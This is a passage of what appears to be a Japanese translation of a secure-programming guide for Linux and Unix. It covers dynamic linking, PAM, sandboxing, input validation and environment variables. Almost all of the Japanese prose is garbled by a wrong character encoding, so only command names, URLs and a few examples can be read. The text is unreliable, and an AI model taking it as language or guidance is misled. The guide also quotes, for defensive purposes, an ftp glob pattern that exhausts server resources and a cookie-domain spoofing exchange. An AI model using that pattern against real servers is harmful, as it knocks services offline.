CׂĕAݒt@CăI[vēǂݍ݁AĂуOt@C
J܂BŃT[o~߂Đݒ肪sAf[^ȂƂȂ
O[e[Vł܂B炩̃T[oĂāÅ
قǂƎvȂAЂ̋@\T|[gĂB

Michal Zalewski [2001] ͂ǂăVOinhU󂯂邩ɂ
āAf炵`[gA܂B̒ŃVOi̋
ɔr邩ɂāAAhoCXĂ܂Bɏ𓾂
Ȃvǂނ悤ɂ߂܂Bɏ̂́A邱
łAMichal ̂̂ƓlłB

 E \ȌǂȏꍇłAVOinh͓̃tOݒ肷
    ɂāAɉȂ悤ɂĂB
   
 E 蕡GȃVOinh𓾂ȂȂAVOinh
    ŎgpĂSłAɎw肪̂𗘗p悤ɂ
    ĂBɁAC  malloc()  free()(VOiی삳Ă
    ȂVXe唼) łȂAmalloc()  free()ɈˑĂ邽
    ̊֐(printf() t@~[ syslog())gpȂł
    Bubp[vāASłȂCuĂяoƂ\
    łBbp[ōēh߂ɃO[oȃtO`FbN܂
    B߂͂܂B
   
 E vOŃAg~bNłȂsĂԂ́AVOio
    ubNAVOinhłVOioubNĂ
    B
   
 

3.6. Quota ƃ\[X̐

Unix CNȃVXȇ́At@CVXe̊蓖Đ(quota)
vZX̃\[XsȂ@\Ă܂B Linux 
Ă܂B̎dg݂̓T[rXۍUĥɓɖ𗧂܂Be[
Upł郊\[X𐧌邱ƂŁAPƃ[UVXeŜ̃\
[XHsɂł܂B̋@\ɂ́Aun[hȐv(hard
limit)Ɓu\tgȐv(soft limit)̈ӖAӖقȂ
̂ŁAӂKvłB

Lu(t@CVXe)̊蓖Đ́A}Eg|Cgɐݒ肪
\ŁÃ[UO[vŎgpłubNt@C
(inode)ɐ܂Bun[hȁv̂z邱Ƃł
Ȃ̂ɑ΂āAu\tgȁv͈̂ꎞIɐz邱ƂĂ
܂B quota(1)Aquotactl(2)Aquotaon(8)QƂĂB

rlimit ́AvZXɑ΂鐔X̊蓖Đdg݂ŁAt@C
TCYqvZXAI[vłt@C܂Bu\tg
ȁv(̐(current limit)Ƃ)Ɓun[hȐv (
(upper limit)Ƃ)܂B\tgȐ𒴂邱Ƃ͌Ăł
܂񂪁AVXeR[ɂăn[h̏܂łĂƂł
B getrlimit(2) setrlimit(2)Agetrusage(2)Asysconf(3)Aulimit(1)
QƂĂB@邱ƂɒӂĂ
BPAM W[ł pam_limits  1 łB

 

3.7. _Ci~bNNECu

vOsɂ́AۃCuKvƂȂ܂B Linux ܂
ŋ߂ Unix CNȃVXȇ唼́AvO̓ftHgŃ_Ci~
bNNECu(DLL)găRpCĂ܂B܂肠郉
CuXV΁ÃCugĂvOׂĂV
(܂΂ǂ)o[WɂȂ܂B

ʃ_Ci~bNNECúAʂȃfBNgɑ݂
܂Bʏ́A/lib  /usr/libA PAM W[ /lib/securityA X
Window System  /usr/X11R6/libA /usr/local/lib ɓ܂Bv
ÓA̕WIȊg悤ɂĂBfobO
ẮAJgfBNg_Ci~bNNECu݂
ǂĂ悤ȒlgȂł(U҂D݂́uCu
vǉłĂ܂܂)B

CuɖOtAV{bNN𒣂ꍇɓʂȖ񑩎
݂܂B̌ʂƂāACuVĂAÂāAobN
[hERp`reBȂo[W̃CuT|[gł܂
B܂ÃCuʂȃvOs鎞ɁA郉Cu
̓̊֐ύX@܂B Unix CNȃVXe
 Windows CNȃVXeƔׂāAɂ߂ėDĂ_łBUnix
CNȃVXe̓Cu̍XVs_ł́ADꂽVXe
v܂B̗Dꂽ_ƂȂAWindows x[X̃VXe Unix
 Linux VXe̕肵ĂƍlĂ܂B

Linux VXeׂĂ܂ GNU glibc x[X̃VXeł́AfBNg
̈ꗗ /etc/ld.so.conf ɕۑĂAvO͋NԂɎI
ɌĂ܂B Red Hat x[XƂȂĂfBXgr[V
́Aʂ /usr/local/lib  /etc/ld.so.conf ɋLqĂ܂B
oO 1 ƌȂĂ܂B/usr/local/lib  /etc/ld.so.conf
ɒǉ̂́AvȎ𓮂̂ɕKvȍƂłB̍Ƃ
ARed Hat x[XƂȂĂVXeŋʂ́utBbNXvƂɂȂ
Ă܂B郉Ců֐ύXȂ͂
܂܎gꍇ́AD悵ĎgCu(.o t@C)̖O /
etc/ld.so.preload ɋLĂB́uǂ(preloading)vCu
́AWŗpӂĂ̂ɐ悪ă[h܂B̐ǂ݃t@
ĆAً}pb`pɂ悭g܂BfBXgr[Vł́Azz
ɂ͂̂悤ȃt@C͎gp܂BNɃfBNgׂČ
̂͂܂ɎԂ̖ʂȂ̂ŁAۂɂ̓LbVgďĂ
܂B ldconfig(8)̓ftHg /etc/ld.so.conf ǂŁA_Ci~bN
NECûfBNgɃV{bNENK؂ɒ
Đݒ肵 (āAWIȊɂǂ)ALbV
 /etc/ld.so.cache ɏ܂B̃vO͂̃LbV𗘗p
܂B܂Aldconfig  DLL ǉꂽADLL 폜ꂽADLL
̃fBNgƕύXꂽ肵ꍇɂ͕KȂ΂܂
BCuCXg[ɃpbP[WE}l[WƂ 1 
 ldconfig 𓮂ꍇ悭܂BvONƁA_C
i~bNE[_[g /etc/ld.so.cache ǂ݁AKvƂȂ郉Cu
[h܂B

܂܂Ȋϐ̉ߒRg[ł܂BہẢߒ
XĂ܂ϐ݂܂(Ƃ΁AꎞIɕʂ̃Cuɒu
āAsł܂)B Linux ł́Aϐ LD_LIBRARY_PATH ̓R
(:)ŋ؂ċLqĂfBNg̏W܂ŁACu܂
猟ǍɕWIȃfBNg܂BVCu
fobOApr̂߂ɔW̃Cugp鎞ɖɗ
܂BÃfBNgǗłlԂM邱ƂɂȂ܂
BӂĂBϐ LD_PRELOAD ̓IuWFNgt@C̈ꗗ
AWIȃCuύX֐܂ł܂B/etc/ld.so.preload
܂ɂłBϐ LD_DEBUG ̓fobO\܂Buallv
Ǝw肷ƁA_Ci~bNNĂvZXɂāAsɖc
ȏ\܂B

[U_Ci~bNNECuRg[ł悤ɂȂ
A炩̎蓖ĂȂAsetuid  setgid vOʓ|Ȃ
ƂɂȂ܂B̂߁AGNU glibc ̎ł́AvO setuid 
setgid ĂƂ̊ϐ(ē悤ȕϐ)𖳎邩A
ɑ啝Ȑ܂B GNU glib CúAvǑ
`FbN setuid  setgid 𔻒fĂ܂B uid  euid 
Ă邩Agid  egid Ă΁ACu͂̃vO
setuid  setgid(͂p)ĂƉ肵ǍʁA
@\啝ɐANǗ܂B GNU glib Cu[h
Ă݂΂킩܂B elf/rtld.c  sysdeps/generic/dl-sysdep.c 
ĂB uid  gid  euid  egid ɓăvOĂяo
΁Aϐ͋@\ׂē܂B Unix CNȃVXeł
AR͓lł_͕ʂƂāA󋵂ς܂Bsetuid 
setgid vO͊ϐɂނ݂ɉe󂯂ׂł͂܂
B

Linux VXeɂẮA̒ł Program Library HOWTO <http://
www.dwheeler.com/program-library> ɓ܂B

 

3.8. Audit(č)

Unix CNȃVXéAꂼقȂ@ŊčĂ܂B Linux 
łʓIȁučv̎dg݂ syslogd(8)ŁAklogd(8)ƂƂɓĂ
B wtmp(5) utmp(5)Alastlog(8)Aacct(2)QƂ邱Ƃ߂܂
BT[ovO(Apache Web T[ô悤Ȃ)́AƎɍՂč
dg݂Ă̂܂B FHS ɂ΁AčO /var/log
́ÃTufBNgɕۑ悢AƂĂ܂B 

 

3.9. PAM

Sun Solaris قƂǂׂĂ Linux VXeł͔F؂KvȎɁA
Pluggable Authentication Modules(PAM: ւ\ȔF؃W[)g
p܂B PAM g΁AsɔFؕ@̐ݒύXł悤ɂȂ
(Ƃ΃pX[hX}[gJ[h̎gp)B PAM ̗p@ɂ
ڍׂȏ́ASection 10.6 ĂBy󒐁FX}[gJ[h(smart
card)Ƃ́AvXeBbÑJ[h IC ⃁̃`bvڂJ[
hw܂B{ł IC J[hƌĂԃP[X悤łB]̎C
J[hƔׂƁA葽̏i[ł邾ł͂ȂAvO
CXg[Ďs邱Ƃ\ł_傫قȂ܂z

 

3.10. Unix CNȃVXeɌŗLȃZLeBg@\

Unix CNȃVXegׂA܂܂ȃR~jeB낢Ȓ
Jɗ͂𒍂ł܂BƂ΁AUnix CNȃVXê
͋@\gāAČR߂Kw\ZLeBT|[g
Ă܂B\tgEFAJȂA݌v鎞ɂ̊g@\
悤Ɋ撣Ă݂ĂB

FreeBSD ͐VVXeR[ł jail(2) <http://docs.freebsd.org/
44doc/papers/jail/jail.html> Ă܂B jail ƂVXeR[
͊𕡐ɕAz}VT|[g܂(ӖAuX
[p[ chrootvƌ܂)Bp@ƂẮAC^[lbgET[rX
EvoC_̊ŁAz}ṼT[rXƂėp̂唼łB
1  jail ̓ł́AׂẴvZX(root L҂łĂ)͂
jail ͈̔͂ɖ߂肳܂B FreeBSD VXeVKCXg[
Ƀu[gƁA jail ɓvZX 1 ܂BvZX
jail ɓƁÃvZXƂhvZXׂ͂ jail ɓ
܂B jail ɓĂ܂΁At@CԂւ̃ANZX chroot(2)
X^CŐ󂯂܂(chroot 悤ƂĂubN܂)Bl
bg[N\[X𗘗p@\́A IP AhXɐAVX
e\[X̑⌠śׂA啝ɐ؂l߂ÃvZ
XƂ̂Ƃ́A jail ̒̃vZXɂ܂B jail 
ꂼ́A1  IP AhXgĂ܂Bjail ̒̃vZX́A
IP AhXgĊOƂƂ͂łȂ_ɒӂĂBy
Fjail(2)̓{}jAhttp://www.jp.freebsd.org/cgi/mroff.cgi?
subdir=man&lc=1&cmd=&man=jail&dir=jpman-5.0.0%2Fman&sect=0 ɂ܂z

Linux ł͊g@\p\łBƂΐɘ_ POSIX PCpre
B}Eg̓ȃIvVɓ܂B Linux VXeŎ
s𐧌鎎݂Ă܂BAv[`̎d͂܂
܂łB U.S. National Security Agency(NSA)ł Security-Enhanced Linux
(Flask) <http://www.nsa.gov/selinux> JAȌŃZLeB
E|V`AɊÂ|V{܂B Medusa DS9 <http://
medusa.fornax.sk>  Linux gAJ[lxŃ[UԂœF
؃T[oT|[gĂ܂B LIDS <http://www.lids.org> ́At@C
vZXی삵AǗ҂ɃVXeu(lock down)v錠^
Ă܂Bu[x[X̃ANZXvVXe RSBAC <http://
www.rsbac.de> ́AANZXɔėpIȃt[[N(Generalized
Framework for Access Control (GFAC))pĂ܂B Abrams 
LaPadula ɂčÃJ[lW[ɂāA_ȃAN
ZXĂ܂B Subterfugue <http://subterfugue.org>́Au\
tgEFA̎ԂĊĎAsvƂt[[NłBT
h{bNXg[Ts邱ƂŁAVXeR[肵A
p^ԂlύX܂B Linux 2.4 œ삵AύX͂܂
(J[lW[̒ǉ͉Kv܂)B Janus <http://
www.cs.berkeley.edu/~daw/janus> ̓ZLeBc[ŁAꂽs
ŐMłȂAvP[VTh{bNXɕ߂܂B 
User-mode Linux <http://user-mode-linux.sourceforge.net> ́ATh{b
NX̎ 1 ŁAuLinux  Linux 𓮂vƂĂ܂
B̂悤ɂ܂܂ȃAv[`ɂāAZLeBf
Ă܂̂ŁALinus Torvalds ́AقȂZLeBE|V
ł̗pł悤ȔėpIAv[`Jė~AƗv]Ă܂
Bڂ́A http://mail.wirex.com/mailman/listinfo/
linux-security-module ĂB

܂܂ Unix CNȃVXeŁAɂ낢ȃZLeB
g݂Ă܂BÃhLgł͔͈͊OȂ̂ň܂
B

 

Chapter 4. ׂ͂̂Ă؂邱

                                    Ȃ͈~oA\ 
                                    ͂҂Ƃ邱ƂłB     
                                                                       
                                                񐹏⼌ 2  12 

͂ɂ́AMłȂ[Û̂܂BŁAgpO
(I)Kv܂B܂`āA
`Ƀ}b`Ȃׂ̂Ăۂ悤ɂȂ΂܂B
t̒`̎dĂ͂܂(s`Aۂ)
BȂȂAdȃP[X`YĂ܂Ȃ
B

łA؃R[hSȂ̂mF邽߂ɁAeXgp(Ă͓
Ŏs)Łusȁvl`̂͗ǂƂłB͓̓tB^
肵ɂ́A̒ŃtB^UĂ݂āAsȒltB^ʂ
ȂĂ݂܂B͓eɂ܂Ał͑\IȂ
́usȒlv̗Ă݂܂B͓͎ɃtB^Ŗh䂷
KvlłB󕶎u.vAu..vAu../vAu/vu.vł͂
镶u/v́u&v܂ޕAׂĂ̐䕶( NIL 
s)́unCrbgv̕(ɏ\i 254  255)łB
JԂ܂AR[h́uvlŃ`FbNׂł͂܂B
łȂp^e͂Ȃ͂𐧌āAlʂ
ǂm߂邽߂łB̃p^ŏ\ɐĂȂ΁A
Ӑ[p^ĒāA̖肪ȂmFKv܂B

ő啶(K؂Ȃŏ)𐧌āA𒴂Ăs\
ȂȂ悤ɂĂ (obt@I[o[t[ɂĂ̏ڍׂ 
Chapter 5 Ă)B

ł̓f[^^CvƂĂ悭ĝ܂BMł
Ȃ[Ũf[^𗘗pOɁAK؂悤ɂĂB

 E ɑ΂ẮAp^(Ƃ΁AK\Ƃ)
    ʂAɉȂׂ̂ĂۂĂBɐ䕶
    (ɉs NIL)⃁^LN^(ɃVF̃^LN^) 
    ƓȖ肪܂B͂A₩Ƀ^LN^
    uGXP[vv̂őPłB͂ԈēnȂ悤ɂ邽
    ߂łB CERT ͂ȏɁA[CERT 1998ACMU 1998] ɂGXP[v
    Kv̂Ȃ̃XgɍڂĂȂׂĂGXP[v
    悤ɐĂ܂B^LN^ɂĂ̏ڂ́ASection
    7.3 ĂB
   
 E ׂĂɑ΂āAełŏl(Ă̓[)ƍől݂
    ĂB
   
 E dq[̃AhXSɃ`FbN̂́AIɂƂĂ
    BƂ̂AׂẴP[X^ʖڂɃT|[g悤ƂƁAA
    hX̒ɂ͐`ł͂̂́AɕGȌ؂KvƂ
    AhX݂邩łB̂悤ȃ`FbNKvȂA
    ׂ mailaddr(7) IETF RFC 822 [RFC 822]ĂBĂ
    AuʓIȁvC^[lbgEAhX`Pɋ΂
    ł傤By󒍁FIETF́AInternet Engineering Task Force ̗
    ŁAC^[lbgɊ֘AZp̕Wi߂邽߂ɐݗꂽc
    ̂łBs镶 RFC(Requests For Comment)łz
   
 E t@C`FbNĂBʁAMłȂ[ÚA
    u..v (ʃfBNg)Ƃl𐳂̂ƂĎ󂯎肽Ȃ
    ł傤BA͊ɈˑĂ܂B܂A
    ڂĂ悢܂Bɉs(N\
    )́AȂ΍폜ĂBt@CɂẮAfBN
    gɂǂȕύX֎~̂őP̍łBƂ΁Au/v
    ƂĈȂBuglobvT|[gĂ͂܂B
    ܂t@Cg悤ȁu*vu?vAu[v(u]vɑΉ)v
    Ɂu{v(}ɑΉ)vłBƂ΁Auls *.pngvƂR}h
    u*.pngvS PNG t@C̃Xg glob ܂B C  fopen(3) R
    }h(Ƃ)́Aglob ܂񂪁AR}hVF́AftHg
    glob ܂B܂ C ł(Ƃ)glob(3)g glob @\𗘗p
    ܂B glob KvȂ΁A glob ȂVXeR[(Ƃ
    fopen(3)ł邾gp邩AɂĂ(Ƃ΃VF
     glob 镶GXP[v)B glob ȂAאS̒
    ӂ𕥂ĂB glob ͕֗Ɏg܂Aglob 𕡎GɂƃR
    s[^ɂȂׂ̕邱ƂɂȂ܂BƂ΁Aftp T[
    oɂ glob ߂vƁAƂȒPɃ}VŜŃT[
    rXۍUԂɂȂ̂܂B
   
    ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
   
    glob Ăɂ炸Aglob p^ɐȂ
    ƁAƂɂȂł傤B̂悤ȃvÓAƗv
    ZXƂđ点AvZX CPU pʂ₻̑\[XɕK
    ĂB Section 6.4.8 ɂ̕@ɂĂ̂ɏ
    񂪂܂B܂ASection 3.6 ɂ̐̂ɂ
    ďڂ񂪂܂̂ŁAĂB
   
 E URI(URL ܂)ÓȂ̂A`FbNȂ΂܂B URI
    𒼐ڑ삷Ȃ(܂AWeb T[o Web T[oǂ̃vO
    ĂāAvf[^ URL ̏ꍇ)AURI 
    mFȂ΂Ȃ܂B܂ URI œɒӂ𕥂P[X́A
    hLg[g(T[oԂt@CVXë)uv
    Ƃ̂łBhLg[głʓIȕ@́A
    u..vV{bNNoR@łBđ唼̃T[
    óAǂȁu..vfBNg`FbNĂAV{bN
    N͓ɎwȂ͖܂B܂AGR[h(URL GR[h
     UTF-8 GR[h)Ă̂́A܂fR[h邱ƂYȂ
    łBłȂƃGR[hꂽu..v蔲Ă܂܂B
    URI  UTF-8 GR[h邱ƂOƂĂ܂̂ŁAnCrb
    g URI ׂĂۂ̂łSłB
   
    f[^Ƃ URI(URL)VXe̎ĂȂAȒPɂł
    Ƃ͖XvȂłBӂ郆[Ũ[Uɖf
    悤 URI ꍞނƂ΂Ȃ悤ɂȂ΂܂B
    ɏڂ Section 4.10.4 ĂB
   
 E NbL[Œl󂯂Ƃɂ́ApĂNbL[ǂȂ̂
    ĂAhCl\lł邱ƂK`FbNĂ
    BȂƁA (炭NbNꂽ)֘ATCgŨNbL[
    ꍞł܂\܂Bł́AIETF RFC 2965 ŏ
    Ă܂B̃`FbNƂǂ̂悤Ȗ肪
    邩ɂċLqĂ܂B
   
      [U victim.cracker.edu ɃNGXgoANbL[
        session_id="1234" ƕԂĂāAftHg̃hC
        victim.cracker.edu ɐݒ肵܂B
       
      [U spoof.cracker.edu ɃNGXgoANbL[
        Domain=".cracker.edu"  session-id="1111" ƕԂĂ܂B
       
      ēx[U victim.cracker.edu ɃNGXgoALn
        ܂B
       
                 Cookie: $Version="1"; session_id="1234",                       
                         $Version="1"; session_id="1111"; $Domain=".cracker.edu"
       
        victim.cracker.edu ̃T[óA2 Ԗڂ̃NbL[hC
        ̂ƈĂ邱ƂÂ̂ł͂ȂƂm
        AȂ΂܂B
       
łȂȂAp^ɂ́AvOŏII
o͂ɑ΂ēʂȈӖ͕܂߂Ă͂܂B

 E 镶̘AAvO̓ɎĂ鏑ɑ΂āAʂ
    Ӗꍇ邩܂BƂ΁Aۑf[^ɋ
    ̂镶gȂ(łOł)A؂蕶f[^l
    邱ƂKւĂBeLXgt@CɕۑĂf[^
    ɁAJ}(,)R(:)؂ƂĎgĂvO͂
    񂠂܂B͂ɋ؂蕶ĂāAvOɑΏ(
    Ȃ킿jނA炩̕@ŃGR[h)ĂȂ΁A
    肪邩܂B̕łA̖肪
    悭܂B́A̒̕ɃVO̓_uEN
    H[e[V(͂ނ̂Ɏgp)⏬ȂLu<v(SGML  XMLA
    HTML ł̓^O̊JnʂɎgĂ܂B̃tH[}bg
    Ńf[^ۑꍇA̋L͏dvł)ĂP[XłB
    唼̃f[^tH[}bǵAGXP[vV[PXpӂāÂ
    ȃP[XɑΏĂ܂B̃GXP[vV[PXgA
    f[^tB^ĂB
   
 E [Uɑ΂Ă镶̘A߂ꍇɁAʂȈӖP[
    X܂BʓIȗƂāAHTML ̃^O͂ƂĔF߂ꍇA
    ɂȂĂ𑼂̃[UɃ|Xg邱Ƃ܂(Ƃ΁AQX
    gubNuǎ҂̃RgvR[i[)BA̖͍Le
    yڂĂ܂B̘bɂĂɑS̓Iȋc_́A Section 6.15
    AHTML ̃tB^Oɂēc_ Section 4.10 
    B
   
̃eXg 1 ŏWčsĂB΁ÃeXg
ǂAɂȂĊȒPɒł܂B

͂`FbNeXgA\肵ʂmɓ삷悤ɂ
Bʂ̃vOg(t@Cdq[AhXAURL
)`FbNꍇɂ͓ɏdvłB̃vÓAƂ
ȊԈႢĂ邱ƂAu㗝lv(f[^ۂ
gpvOƃ`FbNvOԂőOقȂĂP
[X)܂BK؂ȋKȂAĂB킹āA
̃vOAg@\ĂȂǂ̒ĂB
g@\͒mĂKv܂B

[U̓͂͂ĂԂ́AꎞIɓׂĂ𗎂ƂƂ̂͗
lłB܂ƗvZX쐬̂Aǂlł (
͂sꍇ͏ɓ𗎂ƂÃvZX̗͂vɑ΂ăZL
eB̃`FbNs)B̃P[XƂ킯Ă͂܂̂́A͍
Głꍇ(Ƃ΁Alex  yacc Ƃc[g)AvO
~Oꂪobt@I[o[t[hȂꍇł(Ƃ΁AC 
C++)Bŏɂ@ɂĂ Section 6.4 ĂB

ZLeB̔fsۂɃf[^gp鎞ɂ(Ƃ΁ũ[
Uʉ߂Ȃv)AKMłoHgĂBƂ΁A
JꂽC^[lbgł́A}V IP AhX|[gԍɃ
[U̔F؂CĂ͂܂BƂ̂́Ȁ(ƈ
)[UݒłĂ܂命łBڂ 
Section 6.11 ĂB

L̃TuZNVł́AvOɑ΂邳܂܂ȓ͂ɂĘ_
܂Bϐ umask lAvZX̏Ԃ܂ޓ͂ɂ͒ӂKvł
Bׂ͂ĂMłȂ[UɂăRg[Ă킯ł
Ȃ̂ŁAꂩ_͂Cɂ OK łB

 

4.1. R}hC

vÓAR}hC͂Ăꍇ悭܂B
setuid  setgid vOɑ΂R}hC̃f[^́AM
łȂ[U͂Ă܂BāAR}hC̒lGӂ
̂łꍇɔāAsetuid  setgid vO̓vO
głɑΏȂ΂܂BU҂́AقƂǂނ̃f
[^R}hC͂ł܂ (execve(3)̂悤ȃVXeR[
ĂяoƂ)BāAsetuid  setgid vÓAR}
hC̓͂Ɍ؂AR}hC̈ 0 Ԗڂɓv
OMĂ͂܂(U҂ NULL ܂ނǂȒlݒł
邽)B

 

4.2. ϐ

ϐ́AftHgł͐evZXp܂BvO
ʂ̃vOs(exec)ꍇAϐɔCӂ̒lݒ
܂B setuid  setgid ꂽvOł́A͊댯łBƂ
̂AvOĂяoƂŊϐ̃Rg[\ɂȂA
ϐʂ̃vOɓnĂ܂łBʏAϐ͌p
Ă܂߁Å댯ɈpĂ܂܂BSKv
vÕvOlɌĂяoƁAƊ댯
ϐ̒l̃vOĂяovOɓnĂ܂
܂BL̃TuZNVł́AϐƂ̎舵ɂ
_܂B

 

4.2.1. ϐ̒ɂ͊Ȃ̂

ϐ̒ɂ͊댯Ȃ̂܂BŔAĂ̏ꍇCu
vO͊ϐɂăRg[Ă̂́A̕@
܂A킩ɂAhLgĂȂ̂
肷邩łBƂ IFS ϐ́Ash  bash ŃR}hC
̈𕪊邽߂ɎgpLN^̎wŗpĂ܂BVF
͒჌x̃VXeR[(C  system(3)  popen(3) Perl 
backtick Zq)𗘗pČĂяo邽߁AIFS ϐɈُȒlݒ肷
ƁAꌩSƎvVXeR[댯Ȃ̂ɕςĂ܂ꂪ
܂B̓ bash  sh ̃hLgɍڂĂ܂A͂
Ƃ͏Ă܂BNpĂlAIFS mĂ܂B
 IFS gƃZLeBƂRłāA{̖
IŎۂɂ悭g邩ł͂܂BɍƂɁAׂĂ
ϐhLgĂ킯ł͂ȂAhLgĂ
ƂĂȂ̃vOlύXA댯Ȋϐǉ
܂\܂B܂AB̉@(Lɂ܂)́AK
vȊϐIяoAĉĂ邱ƂłB

 

4.2.2. ϐ̕ۑ@ɂ܂댯

{vÓAWIȃANZXiŊϐ𗘗px^[
BƂ΁AC ł͒l擾̂ getenv(3)gAlݒ肷̂
POSIX Kił putenv(3)gABSD ̊gł setenv(3)g
B܂ϐ폜̂ɂ́Aunsetenv(3)g܂Bŋ
̂́Asetenv(3) Linux łĂ邱ƂłB

AU҂͂̂悤ɍsV悭Kv͂܂BU҂͊
̃f[^̈𒼐ڃRg[Ãf[^̈ execve(2)g
vOɓn܂BꂪӂU\ɂĂ܂B̍U
ϐۂɂǂ̂悤ɓ삷邩𗝉Ă͂߂ėłU
B Linux ł environ(5)΁Av񂵂Ŋϐǂ̂悤
ɋ@\邩킩܂BȒPɌ΁Aϐ͕ɑ΂|C^
̔zւ̃|C^ƂċLĂ܂B̔z͋Kł
ANULL |C^ŏI[Ă܂ (āAz̍Ōオ킩܂)
Blɕւ̃|C^́Aꂼꂪ NIL ŏI[ĂuO=lv
tH[}bg̒̕lꂼwĂ܂BꂪƂ
Ƃ́A܂BƂΊϐɂ́ACR[L(=)
邱Ƃł܂BOłȂlɂ NIL 𖄂߂߂܂B
ȂƌӖł́AOłȂlقȂ镡̃Gg
(Ƃ΁A SHELL ϐl)F߂Ƃ̂܂B\IȃR
}hVF́A֎~Ă܂AU҂[JōƂĂ
΁Aexecve(2)gĂ̂悤ȏ󋵂܂B

̏L^(ݒ肷@)ł̖́AvO (l
ł邩邽߂)̒l 1 `FbN΂悢̂ɁAۂ
Ⴄ̂gĂ܂_ɂ܂B Linux ł GNU glibc Cu
̖肩vOی삷邱ƂɎgł܂B glibc 2.1 ɂ
 getenv ̎́AɍŏɃ}b`ڂ擾A setenv 
putenv ͏ɍŏɃ}b`ڂɐݒ肵܂Bunsetenv ́A}b`
ڂׂĂ܂(GNU glibc ͉̎Ƒf炵ƂI)B
AvOɂ͊ϐɒڃANZXAϐׂĂȂ߂
܂B̏ꍇ́AvOŏł͂ȂAŌɃ}b`
g\܂BƂȂƁAŏ̍ڂ`FbNĂɂ
炸Aۂ͍Ō̍ڂgĂ܂ƂɂȂ܂BU҂͂̎
𗘗pāAی샋[`Ă܂܂B

 

4.2.3. @\\IʂāA

setuid  setgid ĂvOSɂɂ́A͂ƂĕKvȊ
ϐ()炵āAɑIʂȂ΂܂BĊ
ϐŜǍKvƂȂ킸Ȑ̊ϐɁASȒlĐ
肵܂B炩̉ʃvOĂяoȂAꂪԗDꂽ@
Bu댯ȒlׂāvXgAbv@́AIł͂܂
BڊԐڂɌĂяovOƂɃ\[XR[hr[ƂĂ
AȂR[hɁAhLgĂȂVȊϐ
NǉĂ܂܂B̂ 1 댯ł邩
܂B

C  C++ ŊȒPɊ@́AO[oϐ environ  NULL
ݒ肵Ă܂@łBO[oϐł environ  <unistd.h>;
Œ`ĂAC  C++ [U͂̃wb_[t@C #include K
v܂B܂̒lĂAXbh𗧂グȂ΂
܂񂪁AꂪƂȂ邱Ƃ͂߂ɂ܂BƂ̂́AvO
sہAł邾iK(ʏ̓XbhNO)ł
̏sKv邩łB

O[oϐ environ ͂܂܂ȋKiŒ`Ă܂BȋKi
ڒlύX邱ƂF߂Ă邩ǂ͂͂肵܂B
lύX邱ƂŖ肪Ă܂悤 Unix CNȃVXe
͒m܂B͒ʏuenvironv𒼐ڏCĂ܂B̂悤Ȓ
x̍\vfŏƁA炭݊͂ȂȂ܂Bm
ɃN[(ňS)Ȋ𓾂邱Ƃۏ؂܂BϐŜɑ΂
AɂȂăANZXKvȃP[XƂĐ̂ŁAuenvironvϐ
̒lǂʂ̂ƂɕۑĂ̂悢ł傤BAvO
ɂ͂ق̂̒lKvȏꍇقƂǂȂ̂ŁAc͗Ƃق
悢ł傤B

 1 NAɂ@܂B clearenv()ƂhL
gɂ̂ĂȂ֐g@łB clearenv()֐͐
ςĂ܂BPOSIX.1 ł͒`邱ƂɂȂĂ܂Aǂ
킯Kiɂ͓܂łBAclearenv() POSIX.9(Fortran
77  POSIX K)Œ`Ă̂ŁAɂȂĂ܂B Linux
 clearenv()́A<stdlib.h> Œ`Ă܂A#include gĎ
ޑOɁAK __USE_MISC  #defined ĂȂ΂܂B
uvȃAv[`Ƃ __USE_MISC `̂ɁA܂
_SVID_SOURCE  _BSD_SOURCE ܂錾ĂA #include
<features.h> ĂB̓eXgp}NƂČ̋@\łB
__

PATH ́AǋL^Cv̊ϐ 1 łBfBNg̃Xg
ȂĂāAvÔɎgp܂BPATH ɂ́AJgfB
Ng܂߂Ă͂܂Bʂ͒PɁu/bin:/usr/binvƂ
܂B IFS(ftHǵu \t\nvŁAŏ̓̕Xy[Xł)  TZ
(^C][)ݒ肵Ă邩܂B Linux  IFS  TZ ݒ
ĂȂĂA~܂邱Ƃ͂܂BA System V x[X̃VX
e̒ɂ́ATZ ɒlݒ肵ȂƖ肪N̂܂B܂A
IFS ɒlݒ肵ĂȂƂ܂VF悤łB Linux ł
environ(5)āAʓIȊϐ̈ꗗmFAݒ肵ϐ
悢ł傤B

[U񋟂l{ɕKvƂȂA܂l`FbNĂ
(lȒl̃p^Ƀ}b`Ă邩AeĂő啶񒷂𒴂
ĂȂmFĂ)B /etc ɁAuSȊϐ̊v
AMłƂȂt@Ĉ݂złB́A
̖ړIɍvƂȂt@C݂͑܂B悤Ȃ̂Ƃ
āAVXe PAM W[ȂApam_env 𒲂ׂ悢
ł傤B 

VFvO~OƂĎgĂȂAu/usr/bin/envvɁu-v
IvV𗘗p܂(œ삷vO̊ϐׂĂ폜
܂)B܂A/usr/bin/env u-vIvVtŌĂяoāǍ
ɕϐAɒlݒ肵܂(O=ľ`)BɁAvO
^ċN܂Bʏ̓vOtpX(/usr/bin/env)Ŏw
ĂBuenvvƂȂłBƃ[U댯
PATH ̒l쐬Ă܂܂B GNU  env ɂ́u-ivƂ̓`łu
--ignore-environmentv(vONƊϐ폜)
܂Ão[WƂ͌݊܂B

setuid  setgid vO쐬ĂāÅJꂪ𒼐
ĐݒłȂȂAubp[vvO쐬̂ 1 łB
bp[́AvO̊SȒlɐݒ肵ÃvOĂяo
܂BӂȂ΂Ȃ̂́Abp[ΏۂƂȂvO
ۂɌĂяoȂ΂Ȃ_łB̃vOC^v^[Ȃ
̂ȂAԂɐ΂ɊׂȂ悤ɂĂBԂN
AʂɌ setuid  setgid ĂvOł͂ȂA
̃vOC^v^[[hĂ܂ȂłB

 

4.3. t@CEfBXNv^

vOɂ́uI[vt@CEfBXNv^vA܂肠炩
߃I[vĂt@Cn܂B setuid  setgid ꂽvO
ł́AI[vĂt@CƂ̓e[U(p[~bV
͈͓)؂ւAƂƂɔzKv܂B setuid 
setgid ꂽvOł́AVI[vt@CɌŒ肵t
@CEfBXNv^ ID Ɋ蓖ĂĂƑz肵Ă͂܂B
܂[W͂WóAWG[̏o͐ɂȂĂ邱ƁA܂
[ɃI[vĂ邱ƂOɂĂ͂܂B

̗_I͓܂BU҂vONOɃt@
CEfBXNv^I[vN[Ył܂̂ŁAU
͗\zȌ󋵂ɂ悤Ǝv΂łĂ܂܂BU҂Wo͂
A̎ɃvÕt@CI[vɁAWo
I[vĂ邩̂悤ɂȂ܂BăvÓAׂĕWo
͂ɏƂÃt@Cɏł܂܂B C Cu̒
ɂ́Astdin  stdoutAstderr JĂȂ(/dev/null ɑ΂)A
